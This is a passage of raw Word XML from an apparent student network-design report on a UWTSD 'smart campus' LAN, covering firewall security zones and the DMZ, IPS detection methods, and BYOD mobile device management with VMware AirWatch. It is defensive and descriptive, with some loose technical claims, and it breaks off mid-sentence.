        <w:t>Hardware Firewalls and the DMZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4E5277" w14:textId="77777777" w:rsidR="00D57C94" w:rsidRPr="003A34F3" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BEA07B" w14:textId="77777777" w:rsidR="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A hardware firewall is utilised in between the Internet gateway of a LAN and a DMZ to prevent unauthorised packets and/or malicious individuals accessing the secure LAN but also allow </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1F7542" w14:textId="77777777" w:rsidR="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">limited security access to the public accessible DMZ extranet servers. A DMZ can be described as an unsafe zone that is located within a secure LAN that can be accessed remotely from the Internet by the public and/or extranet partners/remote employees. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE2585F" w14:textId="77777777" w:rsidR="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F64DD7F" w14:textId="2D89CBE6" w:rsidR="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A hardware firewall enforces security between these zones by inspecting </w:t>
      </w:r>
      <w:r w:rsidR="00CF5851">
        <w:t>IP header; source, destination and ports</w:t>
      </w:r>
      <w:r>
        <w:t>, which is referred to as ‘Traffic Inspection’, this traffic inspection method inspects each packet that passes through the firewall from the Internet and/or private WAN entering the LAN that is configured to inspect traffic for a specific security policy violation configured by the network security engineer. If a violation is found, the packet is dropped from the network and access is denied to the end user. Hardware firewall security internetworking OS (iOS) contain specialised cryptographic protocols/technologies that are utilised to create site-to-site VPN’s, IPS and various other VPN cryptographic communications. Security values for packet inspection are between 0 which is insecure and 100 which is the most secure. These values are assigned to the firewalls interfaces to identify between the security zones within the network.</w:t>
      </w:r>
      <w:r w:rsidR="003224B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9238B1" w14:textId="77777777" w:rsidR="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2E8F28" w14:textId="68F2E698" w:rsidR="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An interface with a security value higher than another security zone is allowed to pass traffic through the firewall where as an interface with a lower security value is not allowed to pass traffic through to an interface with a higher security </w:t>
      </w:r>
      <w:r w:rsidR="00070ADA">
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="005A1912">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD5FBCD" w14:textId="77777777" w:rsidR="00252E0E" w:rsidRDefault="00252E0E" w:rsidP="00D57C94">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1136B798" w14:textId="77777777" w:rsidR="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within the UWTSD smart campus LAN, two hardware firewalls have been utilised in-between the core and distribution layers of the network to identify security zones within the network which are; a highly secure LAN of 100 (Inside), an unsecure Internet facing zone of 0 (Outside) and a medium secured DMZ zone of 50. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2DEF53" w14:textId="77777777" w:rsidR="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C432A55" w14:textId="109E5FC6" w:rsidR="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The hardware firewalls have been configured to inspect asymmetric traffic</w:t>
      </w:r>
      <w:r w:rsidR="00CF5851">
        <w:t xml:space="preserve"> from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> known vulnerable ports i.e. HTTP, SMB, SSL/TLS etc  that enter the network, if these types of traffic are deemed insecure by the configured security policy, the packet is </w:t>
      </w:r>
      <w:r w:rsidR="00ED0403">
        <w:t>prevented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from entering the UWTSD LAN but allowed to enter the DMZ network along with a generic security policy used to inspect known malicious packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676856B6" w14:textId="77777777" w:rsidR="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79320901" w14:textId="0F906CD8" w:rsidR="00766418" w:rsidRDefault="00766418" w:rsidP="00766418">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Intrusion Prevention System (IPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AC4926" w14:textId="2F853AFF" w:rsidR="00766418" w:rsidRPr="00766418" w:rsidRDefault="00766418" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C11A23" w14:textId="416EADCA" w:rsidR="00E3207D" w:rsidRDefault="00766418" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>An IPS is configured within a</w:t>
      </w:r>
      <w:r w:rsidR="00A07772">
        <w:t xml:space="preserve"> next generation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hardware firewall </w:t>
      </w:r>
      <w:r w:rsidR="004C5FC6">
        <w:t xml:space="preserve">that is a </w:t>
      </w:r>
      <w:r w:rsidR="00D60F59">
        <w:t>reactive</w:t>
      </w:r>
      <w:r w:rsidR="004C5FC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E3207D">
        <w:t xml:space="preserve">control system </w:t>
      </w:r>
      <w:r w:rsidR="004C5FC6">
        <w:t xml:space="preserve">approach </w:t>
      </w:r>
      <w:r w:rsidR="00D21306">
        <w:t xml:space="preserve">to network security within a LAN as opposed to </w:t>
      </w:r>
      <w:r w:rsidR="00D60F59">
        <w:t xml:space="preserve">the predecessor of IPS </w:t>
      </w:r>
      <w:r w:rsidR="001F765E">
        <w:t>called Intrusion</w:t>
      </w:r>
      <w:r w:rsidR="00D21306">
        <w:t xml:space="preserve"> Detection System </w:t>
      </w:r>
      <w:r w:rsidR="00D60F59">
        <w:t xml:space="preserve">(IDS) </w:t>
      </w:r>
      <w:r w:rsidR="00D21306">
        <w:t xml:space="preserve">that is a </w:t>
      </w:r>
      <w:r w:rsidR="00D60F59">
        <w:t>passive</w:t>
      </w:r>
      <w:r w:rsidR="00D21306">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E3207D">
        <w:t xml:space="preserve">monitoring system </w:t>
      </w:r>
      <w:r w:rsidR="00D21306">
        <w:t>approach to network security within a LAN.</w:t>
      </w:r>
      <w:r w:rsidR="00E3207D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B918F2" w14:textId="77777777" w:rsidR="00E3207D" w:rsidRDefault="00E3207D" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B8B0F1" w14:textId="6D5CCF5F" w:rsidR="00D60F59" w:rsidRDefault="00E3207D" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An IPS is an </w:t>
      </w:r>
      <w:r w:rsidR="007E7342">
        <w:t xml:space="preserve">additional layer of security </w:t>
      </w:r>
      <w:r w:rsidR="00D60F59">
        <w:t xml:space="preserve">threat protection </w:t>
      </w:r>
      <w:r w:rsidR="007E7342">
        <w:t xml:space="preserve">functionality within a hardware firewall </w:t>
      </w:r>
      <w:r w:rsidR="00D60F59">
        <w:t>that analyses whole packets</w:t>
      </w:r>
      <w:r w:rsidR="00CF5851">
        <w:t xml:space="preserve"> i.e. the payload data</w:t>
      </w:r>
      <w:r w:rsidR="00D60F59">
        <w:t xml:space="preserve"> for known malicious traffic and known vulnerable exploits based on a configured traffic policy, when the traffic policy is violated the packet is dropped from the network </w:t>
      </w:r>
      <w:r w:rsidR="001F765E">
        <w:t xml:space="preserve">along with the source address and </w:t>
      </w:r>
      <w:r w:rsidR="00D60F59">
        <w:t xml:space="preserve"> the event is</w:t>
      </w:r>
      <w:r w:rsidR="001F765E">
        <w:t xml:space="preserve"> then</w:t>
      </w:r>
      <w:r w:rsidR="00D60F59">
        <w:t xml:space="preserve"> logged within the AAA server for the network security engineer to later evaluate. The IPS policy once configured is applied to the ‘Inside’ interface within the hardware firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5FC437" w14:textId="16F73AF7" w:rsidR="00A07772" w:rsidRDefault="00A07772" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259DC610" w14:textId="1C8C6587" w:rsidR="00A07772" w:rsidRDefault="00A07772" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The two most commonly utilised IPS policy detection mechanisms currently utilised within industry are;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FA2D1" w14:textId="77777777" w:rsidR="00CF5851" w:rsidRDefault="00CF5851" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF5C80B" w14:textId="5FE8C840" w:rsidR="00A07772" w:rsidRDefault="00A07772" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A07772">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Signature Based Detection (SBT);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A07772">
        <w:t>This mechanism utilises a dictionary of Uniquely Identified Signatures (UIS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of known malicious code </w:t>
      </w:r>
      <w:r w:rsidR="00CF5851">
        <w:t xml:space="preserve">that is continuously updated </w:t>
      </w:r>
      <w:r w:rsidR="00E9447D">
        <w:t>by IPS</w:t>
      </w:r>
      <w:r w:rsidR="00CF5851">
        <w:t xml:space="preserve"> once malicious code is found and also from the firewall vendor known malicious traffic dictionary database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3F288A" w14:textId="7E031CA2" w:rsidR="00CF5851" w:rsidRDefault="00CF5851" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586E5F46" w14:textId="6E2710D0" w:rsidR="00CF5851" w:rsidRDefault="00CF5851" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF5851">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Statistical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Anomaly Detection (SAD);</w:t>
      </w:r>
      <w:r w:rsidRPr="00886993">
        <w:t xml:space="preserve"> This mechanism </w:t>
      </w:r>
      <w:r w:rsidR="00E9447D" w:rsidRPr="00886993">
        <w:t>analyses random samples of packets entering the network and compares them to a calc</w:t>
      </w:r>
      <w:r w:rsidR="00886993" w:rsidRPr="00886993">
        <w:t>ulated baseline performance level. If traffic is detected outside of the baseline performance calculation, then the IPS drops the packet from entering the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5466D640" w14:textId="0836334A" w:rsidR="00886993" w:rsidRDefault="00886993" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225A4FCA" w14:textId="55CC9798" w:rsidR="00886993" w:rsidRPr="00886993" w:rsidRDefault="00886993" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Within the UWTSD ‘Smart Campus’ network an IPS was configured using the both SBT mechanism that utilises the Cisco ASA security iOS UIS dictionary that’s continuously updated by Cisco and also the SAD mechanism using the default the security iOS default baseline calculation. The IPS was also configured to log violations within the AAA server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747AF569" w14:textId="77777777" w:rsidR="00766418" w:rsidRPr="00766418" w:rsidRDefault="00766418" w:rsidP="00766418">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC81FED" w14:textId="5E6657CB" w:rsidR="005420B8" w:rsidRDefault="00AA0348" w:rsidP="00022E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0348">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Mobile Device Management (MDM) BYOD </w:t>
      </w:r>
      <w:r w:rsidR="00900E77">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0348">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LAN Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1742E42F" w14:textId="14F32E83" w:rsidR="00022E47" w:rsidRPr="00022E47" w:rsidRDefault="00022E47" w:rsidP="00022E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61937CC9" w14:textId="2D97B548" w:rsidR="00022E47" w:rsidRDefault="008E060E" w:rsidP="00022E47">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00022E47" w:rsidRPr="00022E47">
        <w:t xml:space="preserve">Bring Your Own Device (BYOD) workplace </w:t>
      </w:r>
      <w:r w:rsidRPr="00022E47">
        <w:t>policy</w:t>
      </w:r>
      <w:r w:rsidR="00022E47">
        <w:t xml:space="preserve"> allows employees to bring their personal 802.11 enabled </w:t>
      </w:r>
      <w:r w:rsidR="00911065">
        <w:t xml:space="preserve">wireless </w:t>
      </w:r>
      <w:r w:rsidR="00022E47">
        <w:t>devices into the workplace to connect to the</w:t>
      </w:r>
      <w:r w:rsidR="00911065">
        <w:t xml:space="preserve"> internal</w:t>
      </w:r>
      <w:r w:rsidR="00022E47">
        <w:t xml:space="preserve"> LAN </w:t>
      </w:r>
      <w:r w:rsidR="00911065">
        <w:t>in order to</w:t>
      </w:r>
      <w:r w:rsidR="00022E47">
        <w:t xml:space="preserve"> access company resources provided by the servers and </w:t>
      </w:r>
      <w:r w:rsidR="00911065">
        <w:t xml:space="preserve">data </w:t>
      </w:r>
      <w:r w:rsidR="00022E47">
        <w:t>stored within the SAN.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This policy is popular with management within a company because it reduces the economic costs of purchasing end devices for employees and also the cable infrastructure installation and maintenance costs</w:t>
      </w:r>
      <w:r w:rsidR="00911065">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30125C4E" w14:textId="77777777" w:rsidR="00A07772" w:rsidRDefault="00A07772" w:rsidP="00022E47">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DDB3EA0" w14:textId="1E81391C" w:rsidR="00022E47" w:rsidRDefault="00911065" w:rsidP="00022E47">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Although popular with management it’s a </w:t>
      </w:r>
      <w:r w:rsidR="00423A79">
        <w:t>cybersecurity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nightmare for network security engineers</w:t>
      </w:r>
      <w:r w:rsidR="00423A79">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> because a BYOD</w:t>
      </w:r>
      <w:r w:rsidR="00022E47">
        <w:t xml:space="preserve"> policy presents</w:t>
      </w:r>
      <w:r w:rsidR="00123C59">
        <w:t xml:space="preserve"> a major security threat to the secure LAN that the</w:t>
      </w:r>
      <w:r w:rsidR="001174B9">
        <w:t xml:space="preserve">se potential malicious devices could infect and/or </w:t>
      </w:r>
      <w:r w:rsidR="00423A79">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="001174B9">
        <w:t>utilised to remotely access the network for malicious purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E789ED8" w14:textId="77777777" w:rsidR="00347236" w:rsidRDefault="00347236" w:rsidP="00022E47">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDF78AE" w14:textId="695A433B" w:rsidR="006E794D" w:rsidRDefault="00423A79" w:rsidP="00D65AC1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To combat this threat posed by BYOD</w:t>
      </w:r>
      <w:r w:rsidR="00667E6B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an on-premise MDM relay </w:t>
      </w:r>
      <w:r w:rsidR="00D65AC1">
        <w:t>agent has</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> been utilised within the DMZ extranet servers that </w:t>
      </w:r>
      <w:r w:rsidR="00D65AC1">
        <w:t>performs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a security check of the device</w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t xml:space="preserve"> to see if </w:t>
      </w:r>
      <w:r w:rsidR="00347236">
        <w:t>the device is</w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t xml:space="preserve"> authorised to connect to the network by the main MDM console, AAA and </w:t>
      </w:r>
      <w:r w:rsidR="00667E6B">
        <w:t>Active</w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t xml:space="preserve"> Directory servers located within the internal LAN. If the user and/or device are permitted to utilise the network </w:t>
      </w:r>
      <w:r w:rsidR="00347236">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t>the MDM console then installs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an enterprise </w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t xml:space="preserve">grade </w:t>
      </w:r>
      <w:r>
        <w:t>software firewall and antimalware programme</w:t>
      </w:r>
      <w:r w:rsidR="00D63C89">
        <w:t>, along with an encrypted drive that can only be utilised whilst accessing the internal LAN where all internal data will be stored, so the data cannot be accessed whilst the device is not connected to the MDM servers within the internal LAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> within the BYOD device </w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t xml:space="preserve">from within the LAN out to the DMZ, it </w:t>
      </w:r>
      <w:r>
        <w:t>then scans for security issues and if any are detected the threats are removed/quarantined from the device</w:t>
      </w:r>
      <w:r w:rsidR="00D65AC1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C3CC3" w14:textId="77777777" w:rsidR="00FF1C3F" w:rsidRDefault="00FF1C3F" w:rsidP="00D65AC1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705C24E4" w14:textId="3CF96F1E" w:rsidR="00022E47" w:rsidRDefault="00D65AC1" w:rsidP="00D65AC1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Internal LAN security policies are also applied such </w:t>
      </w:r>
      <w:r w:rsidR="00CF2B30">
        <w:t>as disabling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> USB ports, firewall policies for malicious websites etc. </w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t>When</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the device has been cleared from security threats by the MDM </w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r w:rsidR="00CF2B30">
        <w:t>software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a request to enter the Internal LAN is then </w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sent to the internal </w:t>
      </w:r>
      <w:r w:rsidR="00143CA5">
        <w:t>MDM, AAA</w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t xml:space="preserve"> and AD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> server, that </w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t xml:space="preserve">further </w:t>
      </w:r>
      <w:r>
        <w:t>checks if the user and device have been added to the</w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>DM database</w:t>
      </w:r>
      <w:r w:rsidR="006E794D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to be allowed access to the LAN. A flowchart illustrating this process can be found in figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t>48</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E265F08" w14:textId="71186A34" w:rsidR="00D65AC1" w:rsidRDefault="00D65AC1" w:rsidP="00D65AC1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540E9883" w14:textId="77777777" w:rsidR="00F75EA6" w:rsidRDefault="006E794D" w:rsidP="00D60F59">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57035BE7" wp14:editId="2B0CF734">
            <wp:extent cx="3260272" cy="373443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260272" cy="3734435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DF2E96" w14:textId="0D4AEA26" w:rsidR="00667E6B" w:rsidRDefault="00F75EA6" w:rsidP="00F75EA6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>48</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>:BYOD MDM UWTSD LAN Security Flowchart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D916E84" w14:textId="1732081F" w:rsidR="00667E6B" w:rsidRDefault="00667E6B" w:rsidP="00D65AC1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There are many MDM products available within the market that all offer the same </w:t>
      </w:r>
      <w:r w:rsidR="00B075F1">
        <w:t>foundations</w:t>
      </w:r>
      <w:r w:rsidR="00C26BF5">
        <w:t xml:space="preserve"> and ethos of </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">BYOD security </w:t>
      </w:r>
      <w:r w:rsidR="00C26BF5">
        <w:t>technology but</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> offer different feature sets and have varied efficiency ratings by cybersecurity professionals. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15037BEA" w14:textId="77777777" w:rsidR="00667E6B" w:rsidRDefault="00667E6B" w:rsidP="00D65AC1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B6DF5F" w14:textId="68B982AA" w:rsidR="00EE38A1" w:rsidRDefault="00667E6B" w:rsidP="00667E6B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>An MDM</w:t>
      </w:r>
      <w:r w:rsidR="00C26BF5">
        <w:t xml:space="preserve"> security solution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can either be an in house managed on-premise solution or an off-premise ‘cloud’ solution. The cloud solution is the least secure option because the data from the end users is being transmitted across the unsecure Internet via a web browser that utilises a known vulnerable security protocol port 443; Secure Socket Layer and Transport Layer Security (SSL/TLS)</w:t>
      </w:r>
      <w:r w:rsidR="00D84D84">
        <w:t xml:space="preserve"> that could be </w:t>
      </w:r>
      <w:r w:rsidR="00B0669B">
        <w:t>intercepted</w:t>
      </w:r>
      <w:r w:rsidR="00D84D84">
        <w:t xml:space="preserve"> by malicious actors utilising a MitM attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and also the data is being intrusted to strangers working at the MDM cloud datacentre that could potentially be stolen</w:t>
      </w:r>
      <w:r w:rsidR="00B0669B">
        <w:t xml:space="preserve"> and/or be inefficient at removing security threats installed in the BYOD devices</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B0669B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32897B57" w14:textId="77777777" w:rsidR="00BB592E" w:rsidRDefault="00BB592E" w:rsidP="00667E6B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6810377B" w14:textId="77777777" w:rsidR="00A8071A" w:rsidRDefault="00BB592E" w:rsidP="00A8071A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="00B0669B">
        <w:t>within the UWTSD LAN an on-premise solution has been chosen for maximum data security</w:t>
      </w:r>
      <w:r w:rsidR="00683E0B">
        <w:t xml:space="preserve">. The on-premise MDM provider chosen was VMware Air-watch </w:t>
      </w:r>
      <w:r>
        <w:t>whom</w:t>
      </w:r>
      <w:r w:rsidR="00683E0B">
        <w:t xml:space="preserve"> are the highest rated and most efficient MDM company in the world that also offer a relay agent that can be positioned within the DMZ for a complete MDM security solution. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53898607" w14:textId="77777777" w:rsidR="00A8071A" w:rsidRDefault="00A8071A" w:rsidP="00A8071A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B396934" w14:textId="62F06AF9" w:rsidR="00974093" w:rsidRDefault="00A8071A" w:rsidP="00A8071A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The end device security firewall and anti-malware software chosen to be distributed to end devices by the MDM server and all other UWTSD LAN devices was </w:t>
      </w:r>
      <w:r w:rsidR="0011755A">
        <w:t>Norton Endpoint security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> because </w:t>
      </w:r>
      <w:r w:rsidR="0011755A">
